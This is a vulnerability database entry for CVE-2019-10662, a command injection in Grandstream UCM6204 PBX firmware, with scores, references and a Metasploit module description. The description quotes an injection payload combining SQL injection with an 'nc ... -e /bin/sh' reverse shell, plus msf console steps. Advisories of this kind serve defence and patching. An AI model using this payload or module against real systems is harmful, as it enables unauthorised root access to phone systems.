Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
8.8
CVSSv3

CVE-2019-10662

Published: 30/03/2019 Updated: 01/03/2023
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 940
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C
Subscribe to Ucm6204 Firmware

Vulnerability Summary

Grandstream UCM6204 prior to 1.0.19.20 devices allow remote authenticated users to execute arbitrary code via shell metacharacters in the backupUCMConfig file-backup parameter to the /cgi? URI.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

grandstream ucm6204_firmware

Exploits

Exploit DB: Grandstream UCM62xx IP PBX sendPasswordEmail Remote Code Execution
This Metasploit module exploits an unauthenticated SQL injection vulnerability and a command injection vulnerability affecting the Grandstream UCM62xx IP PBX series of devices The vulnerabilities allow an unauthenticated remote attacker to execute commands as root ...
Exploit DB: Grandstream UCM62xx IP PBX sendPasswordEmail RCE
This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and a command injection vulnerability (technically, no assigned CVE but was inadvertently patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX series of devices The vulnerabilities allow an unauthenticat ...

Metasploit Modules

Grandstream UCM62xx IP PBX sendPasswordEmail RCE

This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and a command injection vulnerability (technically, no assigned CVE but was inadvertently patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an unauthenticated remote attacker to execute commands as root. Exploitation happens in two stages: 1. An SQL injection during username lookup while executing the "Forgot Password" function. 2. A command injection that occurs after the user provided username is passed to a Python script via the shell. Like so: /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \ password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 ` This module affect UCM62xx versions before firmware version 1.0.19.20.

msf > use exploit/linux/http/grandstream_ucm62xx_sendemail_rce
msf exploit(grandstream_ucm62xx_sendemail_rce) > show targets
    ...targets...
msf exploit(grandstream_ucm62xx_sendemail_rce) > set TARGET < target-id >
msf exploit(grandstream_ucm62xx_sendemail_rce) > show options
    ...show and set options...
msf exploit(grandstream_ucm62xx_sendemail_rce) > exploit

References

CWE-78https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920&dl=1https://github.com/scarvell/grandstream_exploitshttps://nvd.nist.govhttps://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.htmlhttps://www.rapid7.com/db/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce/
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-27322CVE-2006-4304wirelessCVE-2023-23022local file inclusionCVE-2024-27058CVE-2024-33820open redirectCVE-2024-27079
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook